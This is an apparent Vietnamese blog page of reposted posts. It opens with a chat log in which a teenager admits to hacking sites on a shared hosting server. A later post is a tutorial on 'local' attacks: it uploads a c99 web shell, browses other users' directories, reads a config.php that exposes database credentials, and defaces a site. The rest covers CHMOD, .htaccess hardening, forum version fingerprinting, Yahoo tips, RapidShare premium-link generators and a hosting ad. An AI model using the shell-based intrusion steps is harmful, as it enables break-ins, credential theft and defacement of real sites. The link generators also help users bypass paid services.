xxxxxxxxxx: vì mình được nhờ xem hộ site đó
War Tanza: mình chưa check
xxxxxxxxxx: nếu nó có lỗi gì thì bạn nói cho mình để mình còn cho họ biết
War Tanza: xin đừng bắt em
xxxxxxxxxx:
War Tanza: em mới 17t à
War Tanza:
xxxxxxxxxx: yên tâm chúng mình cùng ngành mà
War Tanza: vừa tung cái bug truong ton
xxxxxxxxxx: mình cũng muốn học hỏi thôi
War Tanza: 1h sau nó bi hack th2i phải
War Tanza: cái bug cách đây 1 ùuần tung oài mà admin nó chứ chửi mình ngu
xxxxxxxxxx: ???
War Tanza: với lại ngu thiệt
War Tanza: nên hem hack luôn
xxxxxxxxxx: sao hack server nó thôi
xxxxxxxxxx: hack cả site người ta làm chi
War Tanza: nó thách thức
xxxxxxxxxx: ai thách
xxxxxxxxxx: bọn nhân hoà á
War Tanza: không
War Tanza: bọn trường tồn ấy mà
War Tanza: à
War Tanza: còn vctv
War Tanza: bị lỗi server
War Tanza: mình attack 1 site cùng server
War Tanza: sau đ1o local qua D
War Tanza:
xxxxxxxxxx:
War Tanza: không những vctv
War Tanza: mà các site cùng sv đều có thể bị hack bất cứ lúc nào
War Tanza: nhưng mà
xxxxxxxxxx: sao
War Tanza: mình không có tính oánh tầm bậy
War Tanza: cái nào fix được thì fix
xxxxxxxxxx: ko sao
xxxxxxxxxx: mình hiểu
xxxxxxxxxx: nên mình muốn hỏi bạn kỹ
War Tanza: còn ai thách thức thì
xxxxxxxxxx:
xxxxxxxxxx: thế bạn hack trang nào trước
xxxxxxxxxx: rồi mới sang ổ D
xxxxxxxxxx: mà sao cái bênnhan hoà secu kiểu gì vậy
xxxxxxxxxx: à bạn ơi
BUZZ!!!
xxxxxxxxxx: cho mình link đến cái bug đấy
xxxxxxxxxx: để mình xem chút
Server VCTV hosting là server Việt Nam của Nhân Hòa đặt tại FPT.
Bài học rút ra là gì ?
- Kiềng server Nhân Hòa ra
- Không nên tham rẻ để đến lúc bị hack lúc nào không biết
Cập nhật :
Sau khi đăng bài này một số khách hàng gửi lại cho tôi thông báo sau :
THONG BAO
So: 03/TBNH
(V/v: Giai quyet su co may chu IP 210.245.85.133)
Kinh gui: Quy khach hang
Cong ty Nhan Hoa xin thong bao voi Quy khach hang dang su dung dich vu hosting tren may chu co dia chi IP: 210.245.85.133 - dia chi NS210.NHANHOA.COM va NS211.NHANHOA.COM
Ngay 12/07/2008 may chu cua chung toi xay ra su co ngoai y muon dan den mat du lieu o cung, hong file he thong (trong do bao gom ca du lieu tren o cung backup hang tuan).
Hien gio, chung toi con ban sao luu lai duoc mot phan du lieu web den ngay 12/07/2008 va du lieu database trong khoang thang 2 den ngay 23/06/2008.
Truoc tien, chung toi se tao tai khoan hosting va dua lai du lieu cho khach hang tuy nhien du lieu khong duoc cap nhat day du. Neu quy khach co du lieu backup ngay gan nhat thi co the chu dong upload len de website hoat dong duoc som.
Cong ty chung toi rat xin loi khach hang ve su co ngoai y muon noi tren, chung toi se boi thuong 3 thang su dung dich vu mien phi cho quy khach. Rat mong quy khach hang thong cam.
Moi thong tin ho tro xin lien he ngay voi chung toi:
Tel: (04)56.26.533 May le (12 - 32 - 34 - 42)
Hotline: Trung: 0988.7676.93 - Dung: 0979.453.774 - Thang: 0916.129.567 - Quan: 0904.438.438
Email: vtrung@nhanhoa.com - hdu
Kinh gui quy khach hang,
Khi su co hong du lieu o cung xay ra, chung toi da co nguoi mang chiec o cung backup vao TP.HCM cho mot don vi thuc hien viec recovery. Hien gio ho da co cau tra loi nhu sau ve viec cuu du lieu tren o cung nay:
1. Tim thay 42gb backup du lieu duoi dang file nen, va 8gb du lieu MySQL
2. Xac suat thanh cong khoang 50% (Neu file nen sau khi duoc recovery ma giai nen duoc thi moi tinh la thanh cong)
3. Thoi gian thuc hien recovery duoc tien hanh tu ngay 14/12 den het ngay 18/12
Trong thoi gian nay, chung toi con co luu tru 100% du lieu trong thu muc /home (gom co du lieu mail va webcua cac user sau:
--> Không hiểu là nguyên nhân thực chất là đâu ?
ĐỌC THÊM !!!!
(Tác giả:Phạm Đức Hải)
Một trong các lỗi mà các admin hay mắc phải là CHMOD sai, do CHMOD sai nên khả năng site đó bị tấn công là cao hơn rất nhiều so với các site khác CHMOD đúng, đặc biệt là cùng server khi bị hack local. Tất nhiên là chỉ với lỗi này thì không thể tấn công trực tiếp vì đây không phải là lỗi có thể tấn công được. Lỗi này dễ dàng bị khai thác khi thư mục đặt quyền ghi và chạy đồng thời cho một thư mục, thường là các thư mục cho phép upload. Nên hacker dễ dàng chạy shell ở thư mục này. Một trường hợp khác là khi hack local, CHMOD 777 là 1 thảm họa, vì như vậy là đã bị kiểm soát toàn bộ thư mục đó. Và tôi dám chắc dằng tay hacker nào khi hack local mà nhìn thấy cái màu xanh lét (màu thông thường cho các thư mục là ) của thư mục 777 thì mừng ra mặt và nghĩ admin này "gà" nghê
Vì sao tôi viết bài này ? Vì nhiều admin, coder không biết CHMOD là gì ? hoặc chỉ hiểu sơ qua. Họ chỉ quan tâm đến cho website chạy được, chấm hết sad. Nhiều người còn hiểu rất ngây thơ rằng quyền ghi đồng nghĩa với 777. Hoàn toàn sai!!! Vậy CHMOD là gì ? Tôi xin đưa lại bài viết của ông bạn RedHat để các bạn tham khảo, để biết và tránh lỗi trên. Và bạn nên tham khảo thêm bài : Các lỗi có thể có với upload file
CHMOD - đó là phạm trù liên quan đến các files và thư mục, có chức năng chỉ ra cho server biết, ai có thể làm gì đối với file hay thư mục nào đó. Chủ yếu CHMOD đưa ra các lệnh như quyền được đọc, viết vào file (hay thư mục), quyền thực hiện một công việc nhất định.
Vì phần lớn các server làm việc trên cơ sở hệ thống UNIX, nên chúng ta sẽ nghiên cứu về cách CHMOD chính cho các servers này.
Trên các hệ thống UNIX, người sử dụng được chia ra làm 3 nhóm: "user" (chủ nhân trực tiếp của các files), "group" (thành viên của nhóm mà người chủ nhân file có tham gia) và "world" (tất cả những trường hợp khác). Khi bạn kết nối với server, nó sẽ xác định xem bạn thuộc về nhóm nào. Ví dụ bạn kết nối với server bằng FTP, khai báo tên truy cập như một thành viên, chính server sẽ quy bạn vào nhóm "user". Còn những thành viên khác truy cập bằng FTP thuộc về nhóm "group". Khi ai đó đến site của bạn bằng trình duyệt web, sẽ được quy vào nhóm "world".
Sau khi xác định nhóm, người sử dụng sẽ được gán quyền hạn nhất định đối với file hoặc thư mục nào đó. Cụ thể là người sử dụng sẽ được đọc, ghi hay tạo mới (hoặc xóa) file. Để xem thư mục nào đó thì nó phải ủng hộ cho việc xem này. Để được xem nội dung thư mục, thì các files hay thư mục con trong đó cũng phải có chế độ "Cho phép đọc". Còn để tạo file hay thư mục mới nằm trong thư mục này lại đòi hỏi phải có quyền ghi. Tóm lại, để thực hiện một trong những việc trên, cần phải đặt vào thư mục chế độ "quyền đọc" và "quyền thực hiện".
Bây giờ chúng ta sẽ thực hành...
Như trên đã nêu, có tất cả 3 nhóm người sử dụng và 3 "quyền hạn" đối với files hay thư mục. Để xác định quyền hạn cho các nhóm nhất định, thống nhất sử dụng các ký hiệu bằng con số như sau:
4 = read (quyền được đọc)
2 = write (quyền được ghi)
1 = execute (quyền được thực hiện)
Bằng phép cộng đơn giản các con số này có thể hiển thị được cả một "tổ hợp" quyền hạn khác nhau. Ví dụ, 3 (2+1) - quyền ghi và quyền thực hiện đối với file (hay thư mục); 5 (4+1) - quyền đọc và quyền thực hiện; 6 (4+2) - quyền đọc và quyền ghi; 7 (4+2+1) - quyền đọc, ghi và thực hiện. Tóm lại có tất cả 7 phương án sau:
7 = read, write & execute
6 = read & write
5 = read & execute
4 = read
3 = write & execute
2 = write
1 = execute
Ký hiệu lệnh CHMOD thường có 3 con số: con số đầu thể hiện quyền hạn gán cho người sử dụng thuộc nhóm "user" (Tức là đối với bạn). Con số thứ hai chỉ ra quyền hạn của người sử dụng thuộc nhóm "group" và con số thứ ba - dành cho nhóm "world".
Trong phần lớn các chương trình FTP hiện đại đều ủng hộ CHMOD theo kiểu nêu trên (Ví dụ, công cụ truy cập bằng FTP mạnh nhất hiện nay là WS_FTP)
Thế nhưng cũng không thừa nếu như ta biết thêm về các lệnh của hệ thống UNIX. lệnh "chmod" trong UNIX có 2 chế độ: tuyệt đối (Bằng các con số) và bằng các ký hiệu chữ.
Khi sử dụng chế độ tuyệt đối (bằng các con số), thống nhất dùng tổ hợp 3 con số được nêu trên để thể hiện quyền hạn.
Trong trường hợp sử dụng ký hiệu chữ, chúng ta sẽ bắt gặp những ký hiệu sau:
"r" - quyền được đọc
"w" - quyền được ghi
"x" - quyền được thực hiện
Ngoài ra còn có:
"u" - đối với user
"g" - đối với group
"o" - đối với other (world)
"a" - đối với all (tất cả)
Ví dụ: 755 = chmod u=rwx,go=rx filename; 644 = chmod u=rw,go=r filename; 600 = chmod u=rw,go= filename; 444 = chmod a=r filename.
ĐỌC THÊM !!!!
Nếu bạn đang dùng Yahoo! Messenger 9 phiên bản mới nhất và thấy được biểu tượng vương miện bên cạnh nick của mình, thì có nghĩa bạn đang là một người dùng VIP trên Yahoo!. Chương trình Yahoo! Messenger Power User cho phép bạn thực hiện điều này.
Chương trình này hiện thực một chính sách chăm sóc khách hàng đặc biệt của Yahoo!, nhằm tưởng thưởng cho những thành viên trung thành, đồng thời thu hút sự chú ý của những thành viên hiện tại.
Theo đó Yahoo! sẽ chọn ra top 5% người dùng Messenger nhiều nhất, lâu nhất (khoảng 64.000 người) để gởi mail cảm ơn và chăm sóc đặc biệt. Nếu bạn may mắn là một trong các Power User của Yahoo! thì bạn sẽ được hưởng những quyền lợi mà người dùng bình thường không có như:
• Được hỗ trợ trực tuyến (Live Support 24/7)
• Được chọn các biểu tượng, avatar "hàng độc" của Yahoo! Messenger
• Được tham gia All-Stars Group của Yahoo!
• Được dùng thử các phiên bản, tính năng mới nhất của Yahoo! Messenger
Để kiểm tra bạn có phải là một Power User hay không, hãy đăng nhập vào trang Power User
http://messenger.yahoo.com/powerusers, nếu thấy được những giao diện bên dưới thì bạn đã là một Yahoo! Messenger Power User!
http://www.tuoitre.com.vn/Tianyon/Im...ImageID=270736
Tập biểu tượng đặc biệt của Power User
Nếu bạn muốn trở thành một Power User thì không có cách nào khác là phải chờ. Đừng sốt ruột, bởi vì theo định kỳ Yahoo! sẽ mở rộng tiêu chí và thu nạp thêm các Power User mới. Chúc bạn sớm nhận được email mời vào Power User của Yahoo!.
có cái nick reg từ 1998 mà không được là power!
ĐỌC THÊM !!!!
From hoangtan
Hôm nay, vào 1 topic, thấy 1 số bạn vẫn chưa bik local , nên mình mạn phép viết 1 topic, dù mình rất gà, nhưng cũng xin viết tut cho những bạn như mình
ok :
sắn có shell, làm luôn
Code:
http://74.54.136.66/~yeubz/abc/c99.php
bây giờ,giả sử như ta chưa có shell đúng hem
muốn attack 1 site có nhiều cách, nhưng những cách sau newbie tụi mình hay làm
1) tìm bug ngay trên victim
2) nếu victim ko có bug, ta tìm site cùng server local chơi
mình đang muốn nói cách 2 trong topic này
giả sử victim của ta ko có bug, làm jì đây
mình whois xem hàng xóm của nó thử coi
Code:
http://crushmachine.com/rip.php?host=74.54.136.66&page=6
giả sử mình tìm dc 1 thằng này đó có bug, up dc shell. Trong tay có shell, làm jì nhỉ
chơi thoai
Code:
http://74.54.136.66/~yeubz/abc/c99.php
Code:
cd /etc/valiases && ls -lia
khi nó hiện ra, ta tìm victim cần local
giả sử ta dùng luôn thằng yeubz ha, mà site này cũng có sex, tui ghét sex lắm . OK , ta dùng lệnh sau
Code:
dir /home/yeubz/public_html/
sau khi ta vào dc thư mục, thì ta thấy các thư mục, các file, tệp, dùng ệnh này để đọc, vidụ như :
Code:
cat //home/yeubz/public_html/abc/config.php
Code:
<?php
$db_config=array("host"=>"localhost","port"=>"",
"user"=>"demo",
"pass"=>"123456","database"=>"qanh_quanganh");
$common_config=array();
$common_config['product_per_page']="12";
$common_config['member_per_page']="10";
$common_config['guestbook_per_page']="5";
$common_config['support_email']="support@quanganh.com.vn";
$common_config['contact_email']="info@quanganh.com.vn";
$common_config['sales_email']="sales@quanganh.com.vn";
$common_config['axiom_per_member']="10";
$common_config['stories_per_page']="5";
$common_config['page_per_page']="10";
$common_config['diary_per_page']="5";
$common_config['num_free_picture']="10";
$common_config['allow_free_planner']="1";
?>
con các bạn muốn deface, thì mình phải có quyền
Code:
uid=32119(yeubz) gid=32122(yeubz) groups=32122(yeubz)
Code:
http://74.54.136.66/~yeubz/abc/deface.JPG
ĐỌC THÊM !!!!
với IBF
www.server.com/forum/index.php?ipscheck=1&key=ipscheck$1@@
Between the
tags.
PHPBB
www.server.com/forum/docs/CHANGELOG.html
Left, add 1 to the latest ‘Changes since’ version.
_______________________eg:
1. Changelog
i. Changes since 2.0.19
Would mean the phpbb version would be 2.0.20
Với vBB
http://www.server.com/forum/clientscript/vbulletin_global.js
ĐỌC THÊM !!!!
- Nếu bạn dùng Server Linux có sử dụng CPanel khi phát hiện ra có DDoS nếu bạn có quyền root ngay lập tức bạn hãy Suppend Site đang bị tấn công và cài Password tạm thời lên sau khi thao tác xong phần cài password cho folder hoặc site bị tấn công thì bạn có thể Unsuppend để tiếp tục theo dõi.
Tạo một file .htaccess đặt vào thư mục hoặc site đang bị Flood như sau:
.htaccess|
****************************
AuthUserFile /forum/.htpasswd
AuthGroupFile /dev/null
AuthName "Password Protected Area"
AuthType Basic
****************************
và tạo một file .htpasswd
****************************
@domain::@dGdK8ZQg/FjU
****************************
user và pass ở trên là : @domain:
Trên đây chỉ là ví dụ bạn có thể vào http://google.com và Search với từ khóa .htaccess Generator để tự tạo password theo ý muốn.
Bạn nên để password có ký tự @ phía trước và dấu : phía sau vì WinXP đã fix lổi cho nhập Password dạng URL http://user:pass@domain.com/, nếu có @ và : thì Attacker sẽ không thể vượt qua bằng cách nhập trực tiếp User và Pass bằng URL.
Sau đó công việc của bạn phải làm là lên một cấu hình Firewall phù hợp cho site của bạn.
.htaccess
************************************************** ******
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?tenmienbitancong.com [NC]
RewriteRule \.(php|html|asp)$ http://sitefirewall.com [NC,R,L]
************************************************** ******
Với dòng Mod Rewrite trên bạn có thể chống tới 95% tác hại của DDoS gây nên từ xFlash. Nó giúp bạn ngăn cản sự nguy hại từ việc truy cập tự động của xFlash đến site của bạn.
Giải thích về cơ chế hoạt động: Máy chủ của bạn chạy mã lập trình của PHP, ASP, HTML khi một Attacker tấn công vào site bạn, cụ thể ví dụ như tấn công vào http://tenmienbitancong.com/ nó sẽ đọc file index.php lúc này Mod Rewrite sẽ hoạt động và Foward về http://sitefirewall.com sau đó từ http://sitefirewall.com bạn đặt một đoạn mã như sau:
(a href="http://tenmienbitancong.com")Vao Web SIte(/a)
Thay ( và ) bằng <>
Nếu là khách truy cập thật thì họ sẽ Click vào "Vao Web SIte" để được truy cập vào site. Còn nếu vào "hiden xFlash" và nó sẽ không vào được. Bạn có thể nghiên cứu 1 số kiểu ModRewrite kết hợp với mã nguốn trên site của bạn để config site của bạn chống xFlash tốt hơn.
Với 2 cách trên bạn có thể yên tâm là site của bạn sẽ vượt qua được xFlash.
Còn về phương pháp phòng thì duy nhất chỉ có 1 phương pháp : truy cập vào địa chỉ http://macromedia.com/shockwave/down...h&promoid=BIOW và nâng cấp lên phiên bản "FLASH PLAYER" mới nhất bạn sẽ hoàn toàn yên tâm là bạn sẽ không còn bị là một Client hidden cho DDoS của xFlash. Và việc nâng cấp này là hoàn toàn miễn phí.
ĐỌC THÊM !!!!
Bạn đã từng nghe về tập tin .htaccess trên các máy chủ hệ Unix (FreeBSD, Linux, Solaris, True64...)? Bạn biết rằng tập tin này có thể điều khiển được khá nhiều thứ, thậm chí thay đổi được cả thiết lập mặc định của máy chủ Apache http://apache.org/. Thế nhưng bạn đã tận dụng được bao nhiêu lệnh trong tập tin này để làm cho website của mình mạnh mẽ, an toàn hơn?
Trong bài viết tổng hợp này, tác giả sẽ cùng bạn nghiên cứu, ứng dụng một số lệnh thông dụng nhất để thực hiện các tác vụ bảo vệ, điều khiển website theo ý bạn muốn. Nào, xin mời bạn!
Tạo trang báo lỗi mang màu sắc cá nhân
Trong quá trình làm việc với client, nếu có lỗi xảy ra (ví dụ như không tìm thấy tập tin) thì Apache sẽ báo lỗi bằng một trang có sẵn hiển thị mã số của lỗi đó, rất không đẹp và khó hiểu.
Với .haccess thì bạn có thể tự tạo các trang báo lỗi hay hơn. Để làm được điều này thì trong tập tin .htaccess bạn thêm dòng sau:Code:ErrorDocument mã số lỗi /trangloi.html
Trong đó mã số lỗi là mã số của lỗi phát sinh, sau đây là những lỗi hay gặp:
- 401 - Authorization Required (cần password để truy nhập)
- 400 - Bad request (Lỗi do yêu cầu)
- 403 - Forbidden (không được vào)
- 500 - Internal Server Error (lỗi server)
- 404 - Wrong page (lỗi trang, không tìm thấy...)
còn trangloi.html là trang web mà bạn muốn hiển thị khi lỗi phát sinh, có thể đưa vào tập tin này nội dung hay đồ hoạ gì tùy bạn, chẳng hạn liên kết trở về trang chính của trang web. Ví dụ: ErrorDocument 404/trangloi.html hoặc: ErrorDocument500/loi/500.html
Bây giờ bạn hãy tải (upload) 2 tập tin .htaccess và trangloi.html lên hosting của mình.
Chống ăn cắp băng thông (bandwidth)
Thông thường những dịch vụ lưu trữ web chỉ cung cấp cho bạn một lượng dữ liệu luân chuyển (data transfer) nhất định hàng tháng và khi bạn sử dụng hết lượng dữ liệu này, website của bạn sẽ tự động bị đóng cửa. Bạn sẽ phải trả thêm tiền cho lượng băng thông vượt quá hoặc phải buộc lòng chờ đến tháng sau.
Nếu hình ảnh, dữ liệu, … của bạn bị các website khác “ăn trộm” (bằng các thủ thuật đơn giản) làm cho lượng dữ liệu luân chuyển của bạn tăng lên, thì có nghĩa là bạn sẽ phải trả tiền cho cái mà bạn không sử dụng. Sử dụng tập tin .htaccess là một giải pháp hoàn hảo, để ngăn chặn việc sử dụng hình ảnh trái phép trên website của bạn. Bạn chỉ việc đưa vào tập tin .htaccess nội dung sau :Code:RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?trangweb\.com/.*$ [NC]
RewriteRule \.(gif|jpg)$ - [F]
Ở đoạn mã trên tôi sử dụng module Rewrite của máy chủ Apache, bạn chỉ việc thay đổi trangweb.com thành địa chỉ website của mình.
Có thể sử dụng một hình ảnh nào đó cảnh cáo những kẻ “ăn trộm” băng thông, bạn dùng dòng lệnh sau:Code:RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?trangweb\.com/.*$ [NC]
RewriteRule \.(gif|jpg)$ http://www.trangweb.com/diehotlinker.jpg [R,L]
Không cho hiện danh sách tập tin trong thư mục
Trong trường hợp một thư mục nào đó không có tập tin index hoặc default, Apache sẽ hiển thị một danh sách liệt kê những tập tin có trong thư mục đó. Tuy nhiên nếu đây là những tài liệu nhạy cảm, bạn không muốn người khác thấy, hãy thêm lệnh sau vào tập tin .htaccessCode:Options –Indexes
Thay thế trang index
Thông thường khi truy nhập vào một trang web, Apache sẽ tìm tập tin index.htm hoặc default.htm trả kết quả về cho trình duyệt, bạn có thể dùng .htaccess thay đổi mặc định này.Code:DirectoryIndex index.php index .php3 messagebrd.pl index.html index.htm
Với dòng lệnh này thì tất cả các tập tin được liệt kê sẽ được tìm theo thứ tự khi có yêu cầu tới thư mục hiện hành, trang nào được tìm thấy đầu tiên sẽ thành trang index của thư mục.
Cấm/hạn chế IP truy nhập
Một số người muốn làm ngập (flood) trang web của bạn, việc cần làm là ngăn cấm những IP của những người này truy nhập vào trang web, bạn thêm đoạn mã sau vào .htaccess: deny from 203.262.110.20; cho phép IP truy nhập: allow from 203.262.110.20.
Nếu bạn chỉ viết IP dưới dạng: 203.262.110 thì sẽ cấm tất cả IP trong dải từ 203.262.110.1 đến 203.262.110.254.
Sử dụng dòng lệnh sau: Deny from all sẽ cấm tất cả mọi truy nhập đến các trang web trong thư mục, tuy nhiên các tập tin trong đó vẫn có thể được sử dụng từ bên ngoài thông qua các lệnh dạng require hay include (trong lập trình PHP), có thể xem thêm mã nguồn của PHPBB forum,IBF... để hiểu rõ hơn.
Tự động chuyển đến địa chỉ mới (Redirection)
Bạn chuyển trang web của mình đến địa chỉ mới nhưng không phải ai cũng biết điều này, redirect truy nhập từ xa một cách đơn giản bằng lệnh sau:Code:Redirect/olddirectory http://www.trangwebmoi.com/thumucmoi ;
Tuỳ biến đuôi tập tin
Thông thường, tuỳ thuộc vào ngôn ngữ lập trình web mà bạn sử dụng tập tin sẽ có phần mở rộng khác nhau như: html, htm, asp, aspx, php, cgi, …Tuy nhiên nếu sử dụng .htaccess bạn có thể tác động vào máy chủ Apache, Apache sẽ gọi đến tập tin của bạn và trả về cho trình duyệt web của người dùng với phần mở rộng do bạn quy định trong .htaccess. Bạn sử dụng đoạn lệnh sau trong tập tin .htaccess:Code:RewriteEngine on
RewriteRule (.*)\.dll$ $1.html
Html là phần mở rộng thực sự của những tập tin trên website, dll là phần mở rộng do bạn lựa chọn. Lưu ý trong liên kết trên trang web, bạn phải gọi đúng đường dẫn đến tập tin với phần mở rộng mới (ở trên là dll), ví dụ http://www.trangweb.com/in dex.dll
Lưu ý khi sử dụng tập tin .htaccess:
- Chỉ áp dụng trên máy chủ Apache đã bật chế độ .htaccess, nếu chưa bạn hãy thử liên hệ với nhà cung cấp dich vụ hosting.
- Để tạo ra tập tin này bạn có thể sử dụng ngay chương trình Notepad của Windows: chọn chế độ save as với tên .htaccess, nhưng khi lưu nhớ bỏ đuôi txt.
-.htaccess chỉ có tác dụng đối với những tập tin ngang hàng (trong cùng thư mục với nó) hoặc thư mục con. Với thư mục, nó chỉ có tác dụng trong thư mục chứa nó và thư mục con, còn vô tác dụng với thư mục mẹ (parent directory).
- Bạn có thể dùng một số chương trình FTP (Leaf FTP, WS FTP, Cute FTP) để tải tập tin .htaccess lên hosting của mình với chế độ ASCII, nếu nó không hoạt động bạn thử CHMOD với giá trị 644.
(sưu tầm)
ĐỌC THÊM !!!!
Yahoo! Mail là một trong những webmail nổi tiếng nhất từ trước đến nay, có lẽ chỉ đúng sau Google Mail. Nhưng có 1 điều là những ai đang dùng Yahoo! US muốn chuyển sang Yahoo! VN gặp rất nhiều khó khăn. Trong khuân khổ bài viết sau tôi sẽ hướng dẫn các bạn chuyển từ Y! Mail tiếng Anh sang Y! Mail tiếng Việt...
Để chuyển sang giao diện tiếng Việt các bạn vào trang http://edit.yahoo.com/config/set_intl , đăng nhập với ID của mình cần chuyển đổi, và chọn "Yahoo! Vietnam" trong mục "New Setting". Tuy nhiên, giao diện tiếng Việt còn thiếu vài chức năng quan trọng của giao diện tiếng Anh. Cuối cùng bấm Finish.
Lưu ý: Trong giao diện tiếng Việt thì một số thành phần của Y! US bị lược bỏ. Không chỉ cho chuyển từ Yahoo! Mail US sang Yahoo! Mail VN mà còn cho chuyển bất kỳ một tài khoản Yahoo! Mail bất kỳ.
ĐỌC THÊM !!!!
Best> szalinski's generator: http://gen.rapid2host.com/generator.php
• http://rapidbaz.com/ -- Allows Unlimited Link But Max Files Download 20 Mg .
• http://www.sonuhost.com — Allows for up to 3 RapidShare Links per day.
• http://www.rapidshare.co.in — 5 per day.
• http://www.rapidsharepremiumlinkgenerator.com/ — Limit not known.
• http://www.rsfox.com — 5 per day. Has a MegaUpload and a Megarotic link generator as well.
• http://www.veryrapidshare.com/PremiumDownload.aspx — 3 per day.
• http://www.rsgenerator.net — 2 per day. Also has a MegaUpload link generator.
• http://www.premify.com/rapidshare/index.php — 5 per day.
• http://www.kingrapid.com — 3 Links per day.
• http://megadl.info/rs/ — Not known.
• http://vipdirectory.net — 5 Links per day.
• http://www.rsdln.com/dl.html — 4 per day.
• http://rhost.cz — 3 per day.
• http://www.rapitshare.info — 5 per day.
• http://www.rapidloader.info — 5 per day.
• http://megaez.com — Unknown - no bandwidth available at time of test.
• http://www.rapidfile.us — 5 per day.
• http://freerslinks.com — Unknown - all slots for the day were gone at testing.
• http://xuply.com/rs.php — Unknown.
• http://www.rapidshare-premium.com — 10 per day.
• http://www.rapiddownloader.info — 5 per day.
• http://daiphyer.com/megaupload.com/premium.../megaupload.com — Unknown - for MegaUpload links only - users must be registered to use the service.
• http://oregonpr.com — 15 per day.
• http://hc-security.blogspot.com — Has a few different RS generators on site.
• http://chauthanh.info/megaupload — 10 different mirrors on site - MegaUpload links only.
• http://www.megauploadgenerator.com — MegaUpload links only.
• http://freerapid.org — They have 12 different mirrors for this - each with varying allowances on how many files can be downloaded in a day. Here are the ones that we recommend:
— http://rsalmighty.com — 7 per day.
— http://freerapid.org/rapid8.html — 4 per day.
— http://freerapid.org/rapid2.html — 4 per day.
— http://freerapid.org/rapid3.html — 4 per day.
Theo: Bạn Đồng hành
ĐỌC THÊM !!!!
Bạn là một webmaster và bạn đang rất lo lắng cho website của mình một cái hosting tốt, hỗ trợ đầy đủ và tốc độ cực mạnh.
Bạn đã từng tìm tòi ở khắp mọi ngóc ngách trên Internet nhưng vẫn không thể thỏa mãn được mong muốn của mình .
Xin đừng chán nản... bạn đã tìm đến đúng nơi rồi.
Hãy ghé thăm: web4vn.com
Nhưng... tại sao ?
Web4vn.com - Website Hosting miễn phí !
Domain miễn phí -> http://tenban.web4vn.com
Web4vn.com là dịch vụ cung cấp hosting miễn phí với hệ thống server đặt tại FPT Việt Nam.
Cấu hình gói host miễn phí:
-
100 MB Space, 2 GB Bandwidth
-
1 MySQL Database
-
1 Email address (khi sử dụng domain riêng)
-
Hỗ trợ domain .com .net .org .biz .info .org
-
Hỗ trợ free subdomain tenban.web4vn.com
-
Quản lý website với Cpanel 11
Quy định sử dụng host miễn phí:
-
Không sử dụng host để gửi bulk mail
-
Không được host nội dung đồi trụy, có bản quyền, vi phạm luật pháp Việt Nam
-
Website phải được cập nhật nội dung trong thời gian 3 ngày sau khi đăng kí host miễn phí.
-
Tích cực tham gia diễn đàn để hỗ trợ các thành viên mới đăng kí host.
-
Domain phải cập nhật DNS theo quy định.
Những tiện ích của host miễn phí Web4vn.com:
Đăng kí dễ dàng và nhanh chóng, chỉ mất 1 phút, bạn có thể bắt đầu upload website lên host.
Không cần có tên miền, địa chỉ ngắn gọn, dễ nhớ http://tenbanchon.web4vn.com
-
Nhận hỗ trợ từ các thành viên diễn đàn đã đăng kí và sử dụng host.
Hoàn toàn miễn phí. Tại sao lại không chứ?
Hãy bắt đầu website của bạn ngay bây giờ bằng cách nhấn vào đây.
ĐỌC THÊM !!!!
Subscribe to:
Posts (Atom)
